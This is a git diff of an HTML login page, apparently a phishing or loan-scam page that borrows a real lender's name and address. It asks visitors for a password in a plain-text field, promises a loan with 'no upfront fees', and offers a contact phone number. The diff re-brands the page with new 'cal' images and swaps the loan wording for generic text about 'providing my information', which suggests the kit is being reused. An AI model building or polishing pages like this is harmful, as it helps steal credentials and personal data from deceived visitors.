--- a/index.html
+++ b/index.html
@@ -6,11 +6,11 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <link rel="stylesheet" href="xyz.css">
     <title>Lenders Club</title>
-  <link rel="icon" href="Lenders Club Logo.ico" type="image/x-icon">
-  <link rel="shortcut icon" href="Lenders Club Logo.ico" type="image/x-icon">
+  <link rel="icon" href="cal.jpg" type="image/x-icon">
+  <link rel="shortcut icon" href="cal.jpg" type="image/x-icon">
 </head>
 <body>
-<div>  <img class="Logo" src="Lenders Club 123.jpg" alt="Hi"></div><br>
+<div>  <img class="Logo" src="cal123.jpg" alt="Hi"></div><br>
     <h2>Secured Portal</h2>
     <h3>Your Success, Our Priority...!</h3>
      <br>
@@ -27,28 +27,21 @@
         Password <br> <input type="text" name="college" id="XYZ"placeholder="PassKey" required><br><br>
 
         <p>
-            No Upfront Fees: There are no initial costs, security deposits, or insurance requirements.
-            If you agree with the terms outlined in the attached documents and wish to proceed with the loan disbursement.
-            This will initiate the next steps in finalizing your loan.
+            No Upfront Fees: There are no initial costs, security deposits, or payment requirements.
+            If you agree with the terms outlined in the attached documents and wish to proceed with the application.
+            This will initiate the next steps in your application.
         </p> <br>
-        <input type="checkbox" required> I agree with the terms laid by the company and proceed for the loan.
+        <input type="checkbox" required> I agree with the terms laid by the company and proceed by providing my information.
          <br><br>
         <input type="submit" value="Submit">
     </form>
     <hr>    
     <div class="columns">
         <div class="column">
-          <p>    <img src="Lenders Club 123.jpg" alt="Image" height="40" width="250"><br>
-            595 Market Street, Suite 200 <br>
-            San Francisco, California 94105.</p>
-        </div>
-        <div class="column">
           
           <p>
-          <br>
-           <br>
-           For further information contact <br>
-          1 (415) 909-6164</p>
+           For further information contact +1 (415) 909-6164
+          </p>
         </div>
         <div class="column">
           <p>
